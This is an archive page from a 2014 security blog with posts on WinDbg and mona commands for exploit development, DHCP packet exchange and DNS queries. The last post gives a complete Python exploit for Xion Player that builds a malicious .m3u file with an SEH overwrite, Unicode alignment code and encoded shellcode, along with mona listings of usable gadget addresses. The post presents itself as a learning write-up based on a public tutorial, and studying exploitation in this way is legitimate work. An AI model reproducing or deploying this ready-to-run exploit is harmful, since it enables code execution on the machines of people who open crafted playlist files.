Wednesday, December 31, 2014
Useful windbg and mona commands for exploit writing
Find opcodes of instructions, say, "jmp esp"
0:000>a //press Enter key once
Input>jmp esp //press Enter key once
7c901214 jmp esp
0:000> u 7c901214
ntdll!DbgUserBreakPoint+0x2:
7c901214 ffe4 jmp esp
So "ffe4" are the opcodes for "jmp esp"
Opcode Instruction
b0 01 mov al,1
c3 ret
0:000> s -b 0x00000000 L?0xffffffff "b001c3"
Syntax error at '"b001c3"'
0:000> s -b 0x00000000 L?0xffffffff b0 01 c3
77eda3fa b0 01 c3 90 90 90 90 90-8b 41 14 66 8b 08 f6 c1
7c80c190 b0 01 c3 90 90 90 90 90-8b ff 55 8b ec 8b 45 0c
0:000> u 77eda3fa
RPCRT4!NDR_PIPE_HELPER32::GotoNextParam+0x1b:
77eda3fa b001 mov al,1
Opcode Instruction
b0 01 mov al,1
c3 ret n
0:000> s -b 0x00000000 L?0xffffffff b0 01 c2
71a517a1 b0 01 c2 0c 00 90 90 90-90 90 ff 25 18 70 a8 71 ...........%.p.q
77eda6b2 b0 01 c2 08 00 90 90 90-90 90 32 c0 c3 90 90 90 ..........2.....
7c9518ea b0 01 c2 04 00 90 90 90-90 90 8b ff 55 8b ec 56 ............U..V
0:000> u 71a517a1
mswsock+0x17a1:
71a517a1 b001 mov al,1
71a517a3 c20c00 ret 0Ch
push esp / pop ebp / ret
0:000> s -b 0x00000000 L?0xffffffff 54 5D c2
77eedc68 54 5d c2 04 00 90 90 90-90 90 8b ff 55 8b ec 56 T]..........U..V
77eee353 54 5d c2 04 00 90 90 90-90 90 8b ff 55 8b ec 56 T]..........U..V
77eee7b3 54 5d c2 04 00 90 90 90-90 90 8b ff 55 8b ec 51 T]..........U..Q
77eeecd6 54 5d c2 04 00 90 90 90-90 90 8b ff 55 8b ec 6a T]..........U..j
77eeee84 54 5d c2 04 00 90 90 90-90 90 8b ff 55 8b ec 56 T]..........U..V
Random mona commands, might be useful during exploit writing
!mona suggest
!mona assemble -s "mov eax#ret"
Find all executable locations that have a pointer to “jmp ecx”
!mona find -type instr -s "jmp ecx" -p2p -x X
Search for a push (any register), later followed by pop eax, directly followed by inc eax, ending the chain with a retn
!mona findwild -s "push r32#*#pop eax#inc eax#*#retn"
!mona findwild -s "mov r16#*#retn"
ROP gadgets from all loaded DLL's
!mona rop -n -o
ROP gadget from specific DLL
!mona rop -m msvcr71.dll -n
ROP gadgets without bad characters
!mona rop -m msvcr71.dll -n -cpb '\x00\x0a\x0d'
Find stackpivot at offset 1500
!mona stackpivot -n -o -distance 1500
https://labs.snort.org/awbo/windbg.txt
http://windbg.info/doc/1-common-cmds.html
http://blog.disects.com/2014/04/windbg-useful-debugging-commands.html
Thursday, December 25, 2014
DHCP: No IP, to IP!
DHCP stands for Dynamic Host Configuration Protocol, used to assign an IP address to a machine connected to a network. DHCP uses ports 67 and 68 on top of UDP.
In this post we will see how a machine gets an IP Address.
Below 4 packets (Packet number 2 to 5) are mainly used for fetching an IP. Lets get into packet level details of communication.
Machine which is connected to the network sends a broadcast packet using 255.255.255.255 as destination address which is an IP Address lease request will be responded back by the DHCP Server as DHCP Offer message. A DHCP client migh also send it's previous IP Address part of the discover packet.
DHCP server takes a non assigned IP address from the address pool and makes a lease offer to client.
In the above communication, we need to mainly observer the source and destination MAC addresses used.
Point to remember, bootp is the wireshark filter, not dhcp.
http://support.microsoft.com/KB/169289
In this post we will see how a machine gets an IP Address.
Figure DHCP Client Communication Sequence
Source Dest Source Dest Packet MAC addr MAC addr IP addr IP addr Description ----------------------------------------------------------------- Client Broadcast 0.0.0.0 255.255.255.255 DHCP Discover DHCPsrvr Broadcast DHCPsrvr 255.255.255.255 DHCP Offer Client Broadcast 0.0.0.0 255.255.255.255 DHCP Request DHCPsrvr Broadcast DHCPsrvr 255.255.255.255 DHCP ACKBroadcast MAC Address is ff:ff:ff:ff:ff:ffSource (Microsoft)
Below 4 packets (Packet number 2 to 5) are mainly used for fetching an IP. Lets get into packet level details of communication.
Machine which is connected to the network sends a broadcast packet using 255.255.255.255 as destination address which is an IP Address lease request will be responded back by the DHCP Server as DHCP Offer message. A DHCP client migh also send it's previous IP Address part of the discover packet.
Figure DHCP Discover
DHCP server takes a non assigned IP address from the address pool and makes a lease offer to client.
Figure DHCP Offer
Figure DHCP Request
Figure DHCP ACK
In the above communication, we need to mainly observer the source and destination MAC addresses used.
Point to remember, bootp is the wireshark filter, not dhcp.
http://support.microsoft.com/KB/169289
Friday, December 19, 2014
Thursday, December 18, 2014
DNS A Record Query/Response
A Record Query for www.google.co.in
A Record Response for www.google.co.in
A Record Query for domain www.google.com
A Record Response for domain www.google.com
Friday, December 12, 2014
Xion Player Unicode Exploit
Unicode Exploitation Techniques
Below instructions make us point to shellcode
0012F2D0 50 PUSH EAX
0012F2D1 006D 00 ADD BYTE PTR SS:[EBP],CH
0012F2D4 C3 RETN
#!c:\python27\python.exe import struct total_buf_size=5000 # 228 offset buf1 = "A" * 228 #nseh = "MM" nseh = "\x61\x62" # seh = "NN" seh = "\x15\x45" print "seh: ", len(seh) prep_stack = "D" prep_stack = prep_stack + "\x6e" #nop/align prep_stack = prep_stack + "\x55" #push ebp prep_stack = prep_stack + "\x6e" #nop/align prep_stack = prep_stack + "\x58" #pop eax=> ebp into eax prep_stack = prep_stack + "\x6e" #pop/align prep_stack = prep_stack + "\x05\x14\x11" #add eax,11001400 prep_stack = prep_stack + "\x6e" #pop/align prep_stack = prep_stack + "\x2d\x13\x11" #sub eax,11001300 prep_stack = prep_stack + "\x6e" #pop/align print "prep_stack len=", len(prep_stack) prep_jump = "\x50" #push eax prep_jump = prep_jump + "\x6d" #nop/align prep_jump = prep_jump + "\xc3" #ret print "prep_jump len=", len(prep_jump) # offset between the last instruction 0012f3ac and # our venetian jumpcode (c3 = ret) 0012f2d4 # to make sure shellcode is at eax loca = "D"*107 shellcode="PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLK8U9M0M0KPS0U99UNQ8RS44KPR004K22LLDKR2MD4KCBMXLOGG0JO6NQKOP1WPVLOLQQCLM2NLMPGQ8OLMM197K2ZP22B7TK0RLPTK12OLM1Z04KOPBX55Y0D4OZKQXP0P4KOXMHTKR8MPKQJ3ISOL19TKNTTKM18VNQKONQ90FLGQ8OLMKQY7NXK0T5L4M33MKHOKSMND45JBR84K0XMTKQHSBFTKLL0KTK28MLM18S4KKT4KKQXPSYOTNDMTQKQK311IQJPQKOYPQHQOPZTKLRZKSVQM2JKQTMSU89KPKPKP0PQX014K2O4GKOHU7KIPMMNJLJQXEVDU7MEMKOHUOLKVCLLJSPKKIPT5LEGKQ7N33BRO1ZKP23KOYERCQQ2LRCM0LJA" remaining_buf = "D" * (total_buf_size -(len(buf1) + len(nseh)+len(seh)+len(prep_stack)+len(prep_jump) + len(loca) + len(shellcode))) payload = buf1 + nseh + seh + prep_stack + prep_jump + loca + shellcode + remaining_buf print "Payload length ", len(payload) try: fh = open("xion_uni_m3u.m3u", "w") fh.write(payload) fh.close() except: print "Unable to create m3u file!\n"
To Generate cyclic pattern
!mona pc 1500
To find offset of in cyclic pattern at the time of crash
!mona findmsp
To search registers holding pop/pop/ret
!mona seh -cp unicode
seh.txt will be created under C:\Program Files\Immunity Inc\Immunity Debugger. Following is the list of address of our interest, search for string "unicode" in seh.txt.
0x00450015 : pop ebx # pop ebp # ret |startnull,unicode,# asciiprint,ascii {PAGE_EXECUTE_READ} [Xion.exe] ASLR False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.121 # (C:\Program Files\r2 Studios\Xion\Xion.exe)
0x004800f5 : pop ebx # pop ebp # ret | startnull,unicode # {PAGE_EXECUTE_READ} [Xion.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.121 (C:\Program Files\r2 Studios\Xion\Xion.exe)
0x00410079 : pop edi # pop esi # ret 0x04 | startnull,unicode,asciiprint,ascii,alphanum {PAGE_EXECUTE_READ} [Xion.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.121 (C:\Program Files\r2 Studios\Xion\Xion.exe)
0x004400c0 : pop edi # pop esi # ret 0x04 | startnull,unicode {PAGE_EXECUTE_READ} [Xion.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.121 (C:\Program Files\r2 Studios\Xion\Xion.exe)
0x00470166 : pop edi # pop ebp # ret | startnull,unicode possible ansi transform(s) : 0047009A->00470161,ascii {PAGE_EXECUTE_READ} [Xion.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.121 (C:\Program Files\r2 Studios\Xion\Xion.exe)
This article is fully based on Peter Van Eeckhoutte's Unicode exploiting tutorial.
References
https://www.corelan.be/index.php/2009/11/06/exploit-writing-tutorial-part-7-unicode-from-0x00410041-to-calc/
http://www.fuzzysecurity.com/tutorials/expDev/5.html
Subscribe to:
Posts (Atom)